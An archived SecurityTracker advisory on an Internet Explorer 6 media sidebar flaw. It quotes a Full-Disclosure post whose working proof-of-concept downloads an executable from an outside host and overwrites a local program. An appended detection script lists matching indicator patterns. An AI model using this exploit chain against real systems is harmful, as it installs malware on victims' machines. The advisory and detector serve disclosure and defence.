SecurityTracker.com
Category:  Application (Web Browser)  >  Microsoft Internet Explorer (IE)
Vendors:  Microsoft
Microsoft Internet Explorer Media Sidebar Flaw Lets Remote Users Execute Arbitrary Code on the System
SecurityTracker Alert ID:  1007689
CVE Reference:  CAN-2003-0817
Updated:  Jan 20 2004
Original Entry Date:  Sep 12 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 6
Description:  A vulnerability was reported in Microsoft Internet Explorer (IE). A remote user can create HTML that, when loaded by the target user, will cause arbitrary code to be executed.

It is reported that a remote user can exploit a flaw in the media sidebar to cause IE to load a resource file in the "My Computer" zone and have it execute arbitrary code. According to the report, errors in loading media via the media sidebar are processed by the following file (in the local system zone):

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

A remote user can invoke other methods (including a cross-domain scripting flaw discovered by Liu Die Yu) to inject scripting code into this error page, where it runs in the "My Computer" zone.

A demonstration exploit is provided at:

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

Impact:  A remote user can cause arbitrary code to be executed by the target user's browser (with the privileges of the target user).
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:  Access control error, State error
Underlying OS:  Windows (Any)
Reported By:  jelmer <jkuperus@planet.nl>
Message History:   None.


 Source Message Contents

Date:  Fri, 12 Sep 2003 00:31:41 +0200
From:  jelmer <jkuperus@planet.nl>
Subject:  [Full-Disclosure] Internet Explorer 6 on Windows XP allows execution of arbitrary code

 

Internet Explorer 6 on Windows XP allows execution of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a series of advisories concerning
Internet Explorer. By combining one of these issues with an earlier
issue I myself reported a while back, you can construct a specially
crafted webpage that can take any action on a user's system, including
but not limited to installing trojans, keyloggers, wiping the user's
hard drive, etc.


TECHNICAL EXPLANATION :

Internet Explorer 6 comes with a media sidebar in which you can load and
play media clips without even leaving the browser. When you instruct the
media bar to load a file from an unknown host, or the HTTP status
returned by an existing host indicates an error, the media bar displays
an error page inside the media bar, namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URLs are treated as being in the "My Computer" zone and are loaded
from the user's filesystem: perfect conditions for the issue I describe on

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html

to work. Now all that is needed is a way to inject this exploit code
into this page. This method was graciously provided by Liu Die Yu, as
you can read on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

--snip--

error.jsp is a JSP page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>


DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm


WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another
browser such as the excellent Mozilla Firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
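
Added example (not part of the advisory or of the original post): a static triage pass that flags HTML carrying the indicator chain described above, that is, content targeted at the `_media` sidebar together with a `file:javascript:` URL or an ADODB.Stream file write. The rule ids, verdict names and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static triage for the indicator chain in this advisory.
// Rule ids, verdict names and the samples are assumptions made here.
const RULES = [
  { id: "media-target", re: /["']_media["']/i }, // content aimed at the media sidebar
  { id: "script-url", re: /\bfile:\s*javascript:/i }, // script URL form quoted in the post
  { id: "res-error-page", re: /res:\/\/[^"'\s<>]*browselc\.dll\/mb404\.htm/i },
  { id: "adodb-stream", re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']/i },
  { id: "save-to-file", re: /\.SaveToFile\s*\(/i },
];

// Text held in a <textarea> is entity-decoded by the browser before script
// reads .value, so decode common entities before matching.
function decodeEntities(html) {
  const named = { quot: '"', apos: "'", amp: "&", lt: "<", gt: ">" };
  // Out-of-range code points are left as written instead of throwing.
  const cp = (n, raw) => (n <= 0x10ffff ? String.fromCodePoint(n) : raw);
  return html
    .replace(/&#x([0-9a-f]+);/gi, (m, h) => cp(parseInt(h, 16), m))
    .replace(/&#(\d+);/g, (m, d) => cp(Number(d), m))
    .replace(/&(quot|apos|amp|lt|gt);/gi, (m, n) => named[n.toLowerCase()]);
}

function scanHtml(html) {
  const text = decodeEntities(html);
  const hits = RULES.filter((r) => r.re.test(text)).map((r) => r.id);
  const has = (id) => hits.includes(id);
  const fileWrite = has("adodb-stream") && has("save-to-file");
  let verdict = "allow";
  // Sidebar targeting plus script injection or a local file write: the full chain.
  if (has("media-target") && (has("script-url") || fileWrite)) verdict = "block";
  // A lone indicator still deserves a look, but a bare _media link is normal use.
  else if (has("script-url") || fileWrite || has("res-error-page")) verdict = "review";
  return { verdict, hits };
}

// Constructed samples: inert fragments that carry only the indicator strings.
const SAMPLE_CHAIN = [
  '<textarea id="code" style="display:none;">',
  "var s = new ActiveXObject(&quot;ADODB.Stream&quot;);",
  "s.SaveToFile(&quot;placeholder.bin&quot;, 2);",
  "</textarea>",
  '<script>window.open(myURL, "_media");</script>',
].join("\n");
const SAMPLE_BENIGN = '<a href="clip.wmv" target="_media">Play clip</a>';

console.log(scanHtml(SAMPLE_CHAIN), scanHtml(SAMPLE_BENIGN));
```

String matching of this kind is a triage aid for proxies or mail gateways; it does not replace the workaround given in the post.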


 



Copyright 2004, SecurityGlobal.net LLC